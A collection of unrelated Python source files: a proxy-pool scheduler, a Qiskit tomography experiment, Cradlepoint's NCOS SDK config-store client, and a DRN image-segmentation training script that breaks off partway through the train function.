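#                          state_shape=[84, 84], final_step=10 ** 7)
#   with tf.Session() as sess:
#       sess.run(tf.global_variables_initializer())
#       trainer.start()
#
# Worker 0 keeps the render and evaluator duties because gym rendering is only
# available on the main thread (see start() above).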
|
scheduler.py
|
#!/usr/bin/env python
# coding=utf-8
import time
from multiprocessing import Process
from async_proxy_pool.config import SERVER_HOST, SERVER_PORT, SERVER_ACCESS_LOG
from async_proxy_pool.webapi_sanic import app
from async_proxy_pool.logger import logger
from .config import CRAWLER_RUN_CYCLE, VALIDATOR_RUN_CYCLE
from .crawler import crawler
from .validator import validator
class Scheduler:
@staticmethod
def api():
app.run(host=SERVER_HOST, port=SERVER_PORT, access_log=SERVER_ACCESS_LOG)
@staticmethod
def crawler_task(cycle=CRAWLER_RUN_CYCLE):
while True:
crawler.run()
time.sleep(cycle * 60)
@staticmethod
def validator_task(cycle=VALIDATOR_RUN_CYCLE):
while True:
validator.run()
time.sleep(cycle * 60)
def run(self):
try:
api_process = Process(target=Scheduler.api)
api_process.start()
crawler_process = Process(target=Scheduler.crawler_task)
crawler_process.start()
validator_process = Process(target=Scheduler.validator_task)
validator_process.start()
except KeyboardInterrupt as e:
logger.info("You have canceled all jobs")
|
compare_Walltoall_sgd.py
|
import qiskit
import numpy as np
import sys
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.ansatz, qtm.fubini_study, qtm.encoding, qtm.loss  # qtm.loss is used below
import importlib
import multiprocessing
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.ansatz)
importlib.reload(qtm.fubini_study)
def run_walltoall(num_layers, num_qubits):
n_walltoall = qtm.ansatz.calculate_n_walltoall(num_qubits)
thetas = np.ones(num_layers* 3 * num_qubits + num_layers*n_walltoall)
psi = 2*np.random.rand(2**num_qubits)-1
psi = psi / np.linalg.norm(psi)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc.initialize(psi, range(0, num_qubits))
loss_values = []
thetass = []
for i in range(0, 400):
if i % 20 == 0:
print('W_alltoall: (' + str(num_layers) + ',' + str(num_qubits) + '): ' + str(i))
grad_loss = qtm.base.grad_loss(
qc,
qtm.ansatz.create_Walltoall_layerd_state,
thetas, num_layers = num_layers)
thetas -= qtm.constant.learning_rate*(grad_loss)
thetass.append(thetas.copy())
qc_copy = qtm.ansatz.create_Walltoall_layerd_state(qc.copy(), thetas, num_layers)
loss = qtm.loss.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values.append(loss)
traces = []
fidelities = []
for thetas in thetass:
# Get |psi~> = U_target|000...>
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.ansatz.create_Walltoall_layerd_state(qc, thetas, num_layers = num_layers).inverse()
psi_hat = qiskit.quantum_info.Statevector.from_instruction(qc)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces.append(trace)
fidelities.append(fidelity)
    print('Writing ... ' + str(num_layers) + ' layers, ' + str(num_qubits) + ' qubits')
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/loss_values.csv", loss_values, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/thetass.csv", thetass, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/traces.csv", traces, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/fidelities.csv", fidelities, delimiter=",")
if __name__ == "__main__":
# creating thread
num_layers = [1, 2, 3, 4, 5]
num_qubits = [2, 6]
t_walltoalls = []
for i in num_layers:
for j in num_qubits:
t_walltoalls.append(multiprocessing.Process(target = run_walltoall, args=(i, j)))
for t_walltoall in t_walltoalls:
t_walltoall.start()
for t_walltoall in t_walltoalls:
t_walltoall.join()
print("Done!")
|
csclient.py
|
"""
NCOS communication module for SDK applications.
Copyright (c) 2018 Cradlepoint, Inc. <www.cradlepoint.com>. All rights reserved.
This file contains confidential information of CradlePoint, Inc. and your use of
this file is subject to the CradlePoint Software License Agreement distributed with
this file. Unauthorized reproduction or distribution of this file is subject to civil and
criminal penalties.
"""
import json
import os
import re
import select
import socket
import threading
import logging.handlers
import signal
import sys
try:
import traceback
except ImportError:
traceback = None
class SdkCSException(Exception):
pass
class CSClient(object):
"""
The CSClient class is the NCOS SDK mechanism for communication between apps and the router tree/config store.
Instances of this class communicate with the router using either an explicit socket or with http method calls.
Apps running locally on the router use a socket on the router to send commands from the app to the router tree
and to receive data (JSON) from the router tree.
Apps running remotely use the requests library to send HTTP method calls to the router and to receive data from
    the router tree. This allows one to use an IDE to run and debug the application on a computer, although
    there are limitations with respect to device hardware access (i.e. serial, USB, etc.).
"""
END_OF_HEADER = b"\r\n\r\n"
    STATUS_HEADER_RE = re.compile(rb"status: \w*")
    CONTENT_LENGTH_HEADER_RE = re.compile(rb"content-length: \w*")
MAX_PACKET_SIZE = 8192
RECV_TIMEOUT = 2.0
_instances = {}
@classmethod
def is_initialized(cls):
return cls in cls._instances
def __new__(cls, *na, **kwna):
""" Singleton factory (with subclassing support) """
if not cls.is_initialized():
cls._instances[cls] = super().__new__(cls)
return cls._instances[cls]
def __init__(self, app_name, init=False):
self.app_name = app_name
handlers = [logging.StreamHandler()]
if sys.platform == 'linux2':
handlers.append(logging.handlers.SysLogHandler(address='/dev/log'))
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(name)s: %(message)s', datefmt='%b %d %H:%M:%S',
handlers=handlers)
self.logger = logging.getLogger(app_name)
if not init:
return
def get(self, base, query='', tree=0):
"""
Constructs and sends a get request to retrieve specified data from a device.
The behavior of this method is contextual:
- If the app is installed on (and executed from) a device, it directly queries the router tree to retrieve the
specified data.
        - If the app is running remotely from a computer, it calls the HTTP GET method to retrieve the specified data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
            query: Not required.
            tree: Not required.
        Returns:
            A dictionary containing the response (i.e. {"success": True, "data": {}}).
"""
if sys.platform == 'linux2':
cmd = "get\n{}\n{}\n{}\n".format(base, query, tree)
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the get to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.get(device_api, auth=self._get_auth(device_ip, username, password))
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def put(self, base, value='', query='', tree=0):
"""
Constructs and sends a put request to update or add specified data to the device router tree.
The behavior of this method is contextual:
        - If the app is installed on (and executed from) a device, it directly updates or adds the specified data to
          the router tree.
        - If the app is running remotely from a computer, it calls the HTTP PUT method to update or add the specified
data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
value: Not required.
query: Not required.
tree: Not required.
Returns:
            A dictionary containing the response (i.e. {"success": True, "data": {}}).
"""
value = json.dumps(value)
if sys.platform == 'linux2':
cmd = "put\n{}\n{}\n{}\n{}\n".format(base, query, tree, value)
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the put to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.put(device_api,
headers={"Content-Type": "application/x-www-form-urlencoded"},
auth=self._get_auth(device_ip, username, password),
data={"data": '{}'.format(value)})
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def post(self, base, value='', query=''):
"""
Constructs and sends a post request to update or add specified data to the device router tree.
The behavior of this method is contextual:
        - If the app is installed on (and executed from) a device, it directly updates or adds the specified data to
          the router tree.
        - If the app is running remotely from a computer, it calls the HTTP POST method to update or add the specified
data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
value: Not required.
query: Not required.
Returns:
            A dictionary containing the response (i.e. {"success": True, "data": {}}).
"""
value = json.dumps(value)
if sys.platform == 'linux2':
cmd = f"post\n{base}\n{query}\n{value}\n"
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the post to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.post(device_api,
headers={"Content-Type": "application/x-www-form-urlencoded"},
auth=self._get_auth(device_ip, username, password),
data={"data": '{}'.format(value)})
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def delete(self, base, query=''):
"""
        Constructs and sends a delete request to remove specified data from the device router tree.
        The behavior of this method is contextual:
        - If the app is installed on (and executed from) a device, it directly deletes the specified data from
          the router tree.
        - If the app is running remotely from a computer, it calls the HTTP DELETE method to delete the specified
          data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
query: Not required.
Returns:
            A dictionary containing the response (i.e. {"success": True, "data": {}}).
"""
if sys.platform == 'linux2':
cmd = "delete\n{}\n{}\n".format(base, query)
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the delete to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
                response = requests.delete(device_api,
                                           headers={"Content-Type": "application/x-www-form-urlencoded"},
                                           auth=self._get_auth(device_ip, username, password))
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def alert(self, app_name='', value=''):
"""
Constructs and sends a custom alert to NCM for the device. Apps calling this method must be running
on the target device to send the alert. If invoked while running on a computer, then only a log is output.
Args:
app_name: String name of your application.
value: String to displayed for the alert.
Returns:
Success: None
Failure: An error
"""
if sys.platform == 'linux2':
cmd = "alert\n{}\n{}\n".format(app_name, value)
return self._dispatch(cmd)
else:
# Running in a computer and can't actually send the alert.
print('Alert is only available when running the app in NCOS.')
print('Alert Text: {}'.format(value))
def log(self, value=''):
"""
Adds an INFO log to the device SYSLOG.
Args:
value: String text for the log.
Returns:
None
"""
if sys.platform == 'linux2':
self.logger.info(value)
else:
# Running in a computer so just use print for the log.
print(value)
def _get_auth(self, device_ip, username, password):
# This is only needed when the app is running in a computer.
# Returns the proper HTTP Auth for the global username and password.
# Digest Auth is used for NCOS 6.4 and below while Basic Auth is
# used for NCOS 6.5 and up.
import requests
from http import HTTPStatus
use_basic = False
device_api = 'http://{}/api/status/product_info'.format(device_ip)
try:
response = requests.get(device_api, auth=requests.auth.HTTPBasicAuth(username, password))
if response.status_code == HTTPStatus.OK:
use_basic = True
except:
use_basic = False
if use_basic:
return requests.auth.HTTPBasicAuth(username, password)
else:
return requests.auth.HTTPDigestAuth(username, password)
@staticmethod
def _get_device_access_info():
# Should only be called when running in a computer. It will return the
# dev_client_ip, dev_client_username, and dev_client_password as defined in
# the sdk section of the sdk_settings.ini file.
device_ip = ''
device_username = ''
device_password = ''
if sys.platform != 'linux2':
import os
import configparser
settings_file = os.path.join(os.path.dirname(os.getcwd()), 'sdk_settings.ini')
config = configparser.ConfigParser()
config.read(settings_file)
# Keys in sdk_settings.ini
sdk_key = 'sdk'
ip_key = 'dev_client_ip'
username_key = 'dev_client_username'
password_key = 'dev_client_password'
if sdk_key in config:
if ip_key in config[sdk_key]:
device_ip = config[sdk_key][ip_key]
else:
print('ERROR 1: The {} key does not exist in {}'.format(ip_key, settings_file))
if username_key in config[sdk_key]:
device_username = config[sdk_key][username_key]
else:
print('ERROR 2: The {} key does not exist in {}'.format(username_key, settings_file))
if password_key in config[sdk_key]:
device_password = config[sdk_key][password_key]
else:
print('ERROR 3: The {} key does not exist in {}'.format(password_key, settings_file))
else:
print('ERROR 4: The {} section does not exist in {}'.format(sdk_key, settings_file))
return device_ip, device_username, device_password
def _safe_dispatch(self, cmd):
"""Send the command and return the response."""
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
sock.connect('/var/tmp/cs.sock')
sock.sendall(bytes(cmd, 'ascii'))
return self._receive(sock)
def _dispatch(self, cmd):
errmsg = None
result = ""
try:
result = self._safe_dispatch(cmd)
except Exception as err:
# ignore the command error, continue on to next command
errmsg = "dispatch failed with exception={} err={}".format(type(err), str(err))
if errmsg is not None:
            self.log(errmsg)
return result
def _safe_receive(self, sock):
sock.settimeout(self.RECV_TIMEOUT)
data = b""
eoh = -1
while eoh < 0:
# In the event that the config store times out in returning data, lib returns
# an empty result. Then again, if the config store hangs for 2+ seconds,
# the app's behavior is the least of our worries.
try:
buf = sock.recv(self.MAX_PACKET_SIZE)
except socket.timeout:
return {"status": "timeout", "data": None}
if len(buf) == 0:
break
data += buf
eoh = data.find(self.END_OF_HEADER)
status_hdr = self.STATUS_HEADER_RE.search(data).group(0)[8:]
content_len = self.CONTENT_LENGTH_HEADER_RE.search(data).group(0)[16:]
remaining = int(content_len) - (len(data) - eoh - len(self.END_OF_HEADER))
# body sent from csevent_xxx.sock will have id, action, path, & cfg
while remaining > 0:
buf = sock.recv(self.MAX_PACKET_SIZE) # TODO: This will hang things as well.
if len(buf) == 0:
break
data += buf
remaining -= len(buf)
body = data[eoh:].decode()
try:
result = json.loads(body)
except json.JSONDecodeError as e:
# config store receiver doesn't give back
# proper json for 'put' ops, body
# contains verbose error message
# so putting the error msg in result
result = body.strip()
return {"status": status_hdr.decode(), "data": result}
def _receive(self, sock):
errmsg = None
result = ""
try:
result = self._safe_receive(sock)
except Exception as err:
# ignore the command error, continue on to next command
errmsg = "_receive failed with exception={} err={}".format(type(err), str(err))
if errmsg is not None:
            self.log(errmsg)
return result
class EventingCSClient(CSClient):
running = False
registry = {}
eids = 1
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.on = self.register
self.un = self.unregister
def start(self):
if self.running:
self.log(f"Eventing Config Store {self.pid} already running")
return
self.running = True
self.pid = os.getpid()
self.f = '/var/tmp/csevent_%d.sock' % self.pid
try:
os.unlink(self.f)
except FileNotFoundError:
pass
self.event_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.event_sock.bind(self.f)
self.event_sock.listen() # backlog is optional. already set on value found in /proc
self.event_sock.setblocking(False)
self.eloop = threading.Thread(target=self._handle_events)
self.eloop.start()
def stop(self):
if not self.running:
return
self.log(f"Stopping {self.app_name}")
for k in list(self.registry.keys()):
self.unregister(k)
self.event_sock.close()
os.unlink(self.f)
self.running = False
def _handle_events(self):
poller = select.poll()
poller.register(self.event_sock,
                        select.POLLIN | select.POLLERR | select.POLLHUP)  # NOTE: this is never unregistered during cleanup
while self.running:
try:
events = poller.poll(1000)
for f, ev in events:
if ev & (select.POLLERR | select.POLLHUP):
self.log("Hangup/error received. Stopping")
self.stop() # TODO: restart w/ cached registrations. Will no longer be an error case
if ev & select.POLLIN:
conn, addr = self.event_sock.accept()
result = self._receive(conn)
eid = int(result['data']['id'])
try:
cb = self.registry[eid]['cb']
args = self.registry[eid]['args']
try:
# PUTting just a string to config store results in a json encoded string returned.
# e.g. set /config/system/logging/level "debug", result['data']['cfg'] is '"debug"'
cfg = json.loads(result['data']['cfg'])
except TypeError as e:
# Non-string path
cfg = result['data']['cfg']
try:
cb_return = cb(result['data']['path'], cfg, args)
except:
if traceback:
traceback.print_exc()
self.log(f"Exception during callback for {str(self.registry[eid])}")
if result['data']['action'] == 'get': # We've something to send back.
# config_store_receiver expects json
cb_return = json.JSONEncoder().encode(cb_return)
conn.sendall(
cb_return.encode()) # No dispatch. Config store receiver will put to config store.
except (NameError, ValueError) as e:
self.log(f"Could not find register data for eid {eid}")
except OSError as e:
self.log(f"OSError: {e}")
raise
def register(self, action: object, path: object, callback: object, *args: object) -> object:
if not self.running:
self.start()
# what about multiple registration?
eid = self.eids
self.eids += 1
self.registry[eid] = {'cb': callback, 'action': action, 'path': path, 'args': args}
cmd = "register\n{}\n{}\n{}\n{}\n".format(self.pid, eid, action, path)
return self._dispatch(cmd)
def unregister(self, eid):
ret = ""
try:
e = self.registry[eid]
except KeyError:
pass
else:
if self.running:
cmd = "unregister\n{}\n{}\n{}\n{}\n".format(self.pid, eid, e['action'], e['path'])
ret = self._dispatch(cmd)
del self.registry[eid]
return ret
def clean_up_reg(signal, frame):
"""
When 'cppython remote_port_forward.py' gets a SIGTERM, config_store_receiver.py doesn't
clean up registrations. Even if it did, the comm module can't rely on an external service
to clean up.
"""
EventingCSClient().stop()
sys.exit(0)
signal.signal(signal.SIGTERM, clean_up_reg)
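# Usage sketch (the app name is hypothetical; the config path appears in the
# comments above). On NCOS this goes through the local config-store socket, on a
# computer it uses the HTTP API configured in sdk_settings.ini:
#
#   cs = EventingCSClient('example_app')
#   level = cs.get('/config/system/logging/level')
#   cs.put('/config/system/logging/level', 'debug')
#   cs.on('put', '/config/system/logging/level',
#         lambda path, value, args: cs.log(f'{path} changed to {value}'))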
|
segment.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import json
import logging
import math
import os
import shutil
import sys
import threading
import time
from os.path import exists, join, split
import numpy as np
import torch
import torch.backends.cudnn as cudnn
from PIL import Image
from torch import nn
from torch.autograd import Variable
from torchvision import transforms
from . import data_transforms as transforms
from . import drn
try:
from modules import batchnormsync
except ImportError:
pass
FORMAT = "[%(asctime)-15s %(filename)s:%(lineno)d %(funcName)s] %(message)s"
logging.basicConfig(format=FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
CITYSCAPE_PALETTE = np.asarray([
[128, 64, 128],
[244, 35, 232],
[70, 70, 70],
[102, 102, 156],
[190, 153, 153],
[153, 153, 153],
[250, 170, 30],
[220, 220, 0],
[107, 142, 35],
[152, 251, 152],
[70, 130, 180],
[220, 20, 60],
[255, 0, 0],
[0, 0, 142],
[0, 0, 70],
[0, 60, 100],
[0, 80, 100],
[0, 0, 230],
[119, 11, 32],
[0, 0, 0]], dtype=np.uint8)
def fill_up_weights(up):
w = up.weight.data
f = math.ceil(w.size(2) / 2)
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(w.size(2)):
for j in range(w.size(3)):
w[0, 0, i, j] = \
(1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c))
for c in range(1, w.size(0)):
w[c, 0, :, :] = w[0, 0, :, :]
class DRNSeg(nn.Module):
def __init__(self, model_name, classes, pretrained_model=None,
pretrained=True, use_torch_up=False):
super(DRNSeg, self).__init__()
model = drn.__dict__.get(model_name)(
pretrained=pretrained, num_classes=1000)
pmodel = nn.DataParallel(model)
if pretrained_model is not None:
pmodel.load_state_dict(pretrained_model)
self.base = nn.Sequential(*list(model.children())[:-2])
self.seg = nn.Conv2d(model.out_dim, classes,
kernel_size=1, bias=True)
self.softmax = nn.LogSoftmax()
m = self.seg
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
if use_torch_up:
self.up = nn.UpsamplingBilinear2d(scale_factor=8)
else:
up = nn.ConvTranspose2d(classes, classes, 16, stride=8, padding=4,
output_padding=0, groups=classes,
bias=False)
fill_up_weights(up)
up.weight.requires_grad = False
self.up = up
def forward(self, x):
x = self.base(x)
x = self.seg(x)
y = self.up(x)
return y, x
def optim_parameters(self, memo=None):
for param in self.base.parameters():
yield param
for param in self.seg.parameters():
yield param
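# Shape sketch (illustrative; 'drn_d_22' is assumed to be one of the model names
# exported by drn.py, and the input size is arbitrary):
#
#   model = DRNSeg('drn_d_22', classes=19)
#   y, x = model(torch.randn(1, 3, 512, 512))
#   # y: upsampled logits, (1, 19, 512, 512)
#   # x: 1/8-resolution logits before the transposed-convolution upsampling, (1, 19, 64, 64)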
class SegList(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, list_dir=None,
out_name=False):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.out_name = out_name
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
def __getitem__(self, index):
img = Image.open(join(self.data_dir, self.image_list[index]))
data = [img]
if self.label_list is not None:
label = Image.open(join(self.data_dir, self.label_list[index]))
# label = label.resize([int(label.size[0]*0.25), int(label.size[1]*0.25)], Image.NEAREST)
data.append(label)
data[0] = self.transforms(data[0])
if self.label_list is not None:
data[1] = torch.LongTensor(np.array(data[1]))
if self.out_name:
if self.label_list is None:
data.append(data[0][0, :, :])
data.append(self.image_list[index])
return tuple(data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
class SegListSeg(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, starting=None, ending=None, list_dir=None,
out_name=False):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.out_name = out_name
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.starting = starting
self.ending = ending
self.read_lists()
def __getitem__(self, index):
img = Image.open(join(self.data_dir, self.image_list[index]))
data = [img]
if self.label_list is not None:
label = Image.open(join(self.data_dir, self.label_list[index]))
# label = label.resize([int(label.size[0]*0.25), int(label.size[1]*0.25)], Image.NEAREST)
data.append(label)
data[0] = self.transforms(data[0])
if self.label_list is not None:
data[1] = torch.LongTensor(np.array(data[1]))
if self.out_name:
if self.label_list is None:
data.append(data[0][0, :, :])
data.append(self.image_list[index])
return tuple(data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
# self.image_list.sort()
if self.starting is not None:
assert self.starting < len(self.image_list)
if self.ending is not None:
assert self.ending <= len(self.image_list)
if (self.starting is not None) and (self.ending is not None):
assert self.starting < self.ending
if (self.starting is not None) and (self.ending is None):
self.image_list = self.image_list[self.starting:]
elif (self.ending is not None) and (self.starting is None):
self.image_list = self.image_list[:self.ending]
elif (self.ending is not None) and (self.starting is not None):
self.image_list = self.image_list[self.starting:self.ending]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
# self.label_list.sort()
if (self.starting is not None) and (self.ending is None):
self.label_list = self.label_list[self.starting:]
elif (self.ending is not None) and (self.starting is None):
self.label_list = self.label_list[:self.ending]
elif (self.ending is not None) and (self.starting is not None):
self.label_list = self.label_list[self.starting:self.ending]
assert len(self.image_list) == len(self.label_list)
class SegListSegAdv(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, starting=None, ending=None, list_dir=None,
out_name=False):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.out_name = out_name
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.box_list = None
self.target_list = None
self.starting = starting
self.ending = ending
self.read_lists()
def __getitem__(self, index):
img = Image.open(join(self.data_dir, self.image_list[index]))
data = [img]
if self.label_list is not None:
label = Image.open(join(self.data_dir, self.label_list[index]))
label1 = Image.open(join(self.data_dir, self.label_list[index])[:-4]+'1.png')
# label = label.resize([int(label.size[0]*0.25), int(label.size[1]*0.25)], Image.NEAREST)
data.append(label)
data.append(label1)
data[0] = self.transforms(data[0])
if self.label_list is not None:
data[1] = torch.LongTensor(np.array(data[1]))
data[2] = torch.LongTensor(np.array(data[2]))
if self.out_name:
if self.label_list is None:
data.append(data[0][0, :, :])
data.append(self.image_list[index])
data.append(self.box_list[index])
data.append(self.target_list[index])
return tuple(data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
box_path = join(self.list_dir, self.phase + '_box.txt')
target_path = join(self.list_dir, self.phase + '_target.txt')
# box_path = join(self.list_dir, self.phase + '_target.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
# self.image_list.sort()
if self.starting is not None:
assert self.starting < len(self.image_list)
if self.ending is not None:
assert self.ending <= len(self.image_list)
if (self.starting is not None) and (self.ending is not None):
assert self.starting < self.ending
if (self.starting is not None) and (self.ending is None):
self.image_list = self.image_list[self.starting:]
elif (self.ending is not None) and (self.starting is None):
self.image_list = self.image_list[:self.ending]
elif (self.ending is not None) and (self.starting is not None):
self.image_list = self.image_list[self.starting:self.ending]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
# self.label_list.sort()
if (self.starting is not None) and (self.ending is None):
self.label_list = self.label_list[self.starting:]
elif (self.ending is not None) and (self.starting is None):
self.label_list = self.label_list[:self.ending]
elif (self.ending is not None) and (self.starting is not None):
self.label_list = self.label_list[self.starting:self.ending]
assert len(self.image_list) == len(self.label_list)
if exists(box_path):
self.box_list = [line.strip() for line in open(box_path, 'r')]
# self.label_list.sort()
if (self.starting is not None) and (self.ending is None):
self.box_list = self.box_list[self.starting:]
elif (self.ending is not None) and (self.starting is None):
self.box_list = self.box_list[:self.ending]
elif (self.ending is not None) and (self.starting is not None):
self.box_list = self.box_list[self.starting:self.ending]
# assert len(self.image_list) == len(self.box_list)
if exists(box_path):
self.target_list = [line.strip() for line in open(target_path, 'r')]
# self.label_list.sort()
if (self.starting is not None) and (self.ending is None):
self.target_list = self.target_list[self.starting:]
elif (self.ending is not None) and (self.starting is None):
self.target_list = self.target_list[:self.ending]
elif (self.ending is not None) and (self.starting is not None):
self.target_list = self.target_list[self.starting:self.ending]
assert len(self.image_list) == len(self.target_list)
class SegListMS(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, scales, list_dir=None):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
self.scales = scales
def __getitem__(self, index):
data = [Image.open(join(self.data_dir, self.image_list[index]))]
w, h = data[0].size
if self.label_list is not None:
data.append(Image.open(join(self.data_dir, self.label_list[index])))
# data = list(self.transforms(*data))
out_data = list(self.transforms(*data))
ms_images = [self.transforms(data[0].resize((int(w * s), int(h * s)),
Image.BICUBIC))[0]
for s in self.scales]
out_data.append(self.image_list[index])
out_data.extend(ms_images)
return tuple(out_data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
def validate(val_loader, model, criterion, eval_score=None, print_freq=10):
batch_time = AverageMeter()
losses = AverageMeter()
score = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
target = target.cuda()
# target = target.cuda(async=True)
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)[0]
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
if eval_score is not None:
score.update(eval_score(output, target_var), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
logger.info('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {score.val:.3f} ({score.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
score=score))
logger.info(' * Score {top1.avg:.3f}'.format(top1=score))
return score.avg
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target):
"""Computes the precision@k for the specified values of k"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
correct = correct[target != 255]
correct = correct.view(-1)
score = correct.float().sum(0).mul(100.0 / correct.size(0))
return score.data[0]
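# Illustrative sketch (not part of the original script; it assumes the torch
# import at the top of this file and the legacy torch.autograd.Variable API used
# throughout): accuracy() scores the per-pixel argmax prediction and skips pixels
# labelled 255, so on the hypothetical 2x2 example below only two pixels count
# and the returned score is 50.0.
def _example_pixel_accuracy():
    # logits for 2 classes over a single 2x2 image: class 1 wins everywhere
    output = torch.autograd.Variable(torch.Tensor(
        [[[[0.1, 0.1], [0.1, 0.1]],
          [[0.9, 0.9], [0.9, 0.9]]]]))
    # one pixel correct (1), one wrong (0), two ignored (255)
    target = torch.autograd.Variable(torch.LongTensor([[[1, 0], [255, 255]]]))
    return accuracy(output, target)  # 50.0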
def train(train_loader, model, criterion, optimizer, epoch,
eval_score=None, print_freq=10):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
scores = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
target = target.cuda()
# target = target.cuda(async=True)
input_var = torch.autograd.Variable(input)
